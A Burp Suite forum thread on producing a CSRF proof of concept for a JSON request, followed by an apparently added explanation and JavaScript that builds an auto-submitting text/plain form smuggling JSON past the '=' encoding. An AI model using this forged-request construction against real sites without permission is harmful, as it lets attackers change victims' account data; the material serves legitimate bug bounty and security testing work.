Burp Suite User Forum


Problem generating a CSRF PoC

Zonduhackerone | Last updated: Oct 15, 2019 09:15PM UTC

I understand how basic CSRF works and I have reported some CSRF issues to some bug bounty programs in the past, but I have encountered this issue that I don't know what to do about. I get this little message when trying to generate a CSRF PoC on a POST request without a CSRF token or headers:

> Warning: The CSRF form uses a different encoding type than the original request, and so the application may not process the request in the way required. Further, the CSRF form uses plain text encoding, and the request body cannot be exactly reproduced because it does not contain the = character. Try modifying the original request so that the body contains the = character.

Where exactly should I add the = character if the original request looks like this, for example:

{"phoneNumber":"+ 48-695-5581-39","zipCode":"12-312"}

I have tried all forms of the CSRF PoC generator and none of them worked. Hope you can help me, thanks.

Mike, PortSwigger Agent | Last updated: Oct 16, 2019 10:30AM UTC

Looking at the source code, it appears this error message is raised when the encoding type specified by the Content-Type header is unable to be determined, or if it is different to the Encoding Type specified in the user interface panel. Is what you have selected in the user interface different from what is specified in the Content-Type header of the request?

test | Last updated: Jul 15, 2020 07:08PM UTC

The Content-Type is application/json.

test | Last updated: Jul 15, 2020 07:12PM UTC

Is it possible to do CSRF when the Content-Type is application/json?

Uthman, PortSwigger Agent | Last updated: Jul 16, 2020 08:52AM UTC

Have you added the Content-Type header into the original request? Or did it already exist? I can only replicate your issue when specifically adding the Content-Type: application/json header to a request where it was not originally present.

Saransh | Last updated: Jun 19, 2021 01:41PM UTC

Hey @uthman, b3twise here with a different account, lol. The Content-Type: application/json header was already there in the original request. Is it possible to do CSRF when the Content-Type is application/json?

Uthman, PortSwigger Agent | Last updated: Jun 21, 2021 08:33AM UTC

Hi, you may find these links helpful in investigating this further:

- https://portswigger.net/burp/documentation/desktop/functions/generate-csrf-poc
- https://medium.com/@ethicalevil/lets-talk-csrf-again-e58bd5b240ca
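The "= character" in Burp's warning refers to the way a browser serialises an enctype="text/plain" form: every field is sent as name=value followed by CRLF, with no percent-encoding. The usual workaround is to split the JSON so that the one = the browser inserts lands inside a throw-away string member. The following is an added example showing that construction for the body from the original post; it is not code from Burp or from any of the participants, and the target URL and the padding key name are assumptions for illustration only.

```javascript
// Added example (not from the original thread): build a text/plain
// form-based CSRF PoC for a JSON request body.
// An enctype="text/plain" form sends each field as `name=value\r\n` with no
// encoding, so the "=" the browser inserts can be hidden inside a dummy
// JSON member. TARGET and the padding key are hypothetical.

const TARGET = "https://example.invalid/api/profile"; // assumed target URL
const ORIGINAL_BODY = { phoneNumber: "+ 48-695-5581-39", zipCode: "12-312" };

// Split the JSON object into a form field name and value such that
// name + "=" + value is still valid JSON. Returns the exact body a
// browser will send for that single field.
function buildTextPlainCsrfField(obj, padKey = "padding") {
  if (Object.prototype.hasOwnProperty.call(obj, padKey)) {
    throw new Error(`padding key ${padKey} collides with a real member`);
  }
  // '{"a":"b"}' -> name: '{"a":"b","padding":"'   value: '"}'
  const json = JSON.stringify(obj);
  const name = json.slice(0, -1) + `,${JSON.stringify(padKey)}:"`;
  const value = '"}';
  // Browsers serialise text/plain forms as name=value followed by CRLF.
  const body = `${name}=${value}\r\n`;
  return { name, value, body };
}

// Minimal escaping so the JSON fragments can sit inside HTML attributes.
function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;");
}

// Render the auto-submitting PoC page.
function buildPocHtml(url, obj) {
  const { name, value } = buildTextPlainCsrfField(obj);
  return [
    `<form id="csrf" action="${escapeAttr(url)}" method="POST" enctype="text/plain">`,
    `  <input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}">`,
    `</form>`,
    `<script>document.getElementById("csrf").submit();</script>`,
  ].join("\n");
}

// What a server that ignores the Content-Type header would parse. Note the
// extra "padding" member: the application must tolerate unknown members,
// and it must accept JSON under Content-Type: text/plain, because a form
// cannot send application/json.
function serverSees(obj) {
  const { body } = buildTextPlainCsrfField(obj);
  return JSON.parse(body);
}
```

The attack only works if the server parses the body as JSON regardless of the Content-Type header and ignores the extra member; that is what you need to confirm in Repeater before sending a PoC. A cross-site request that genuinely carries Content-Type: application/json (for example via fetch or XMLHttpRequest) is not a CORS "simple" request, so the browser sends an OPTIONS preflight and will not send the body unless the target's CORS policy explicitly allows the origin and that header.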
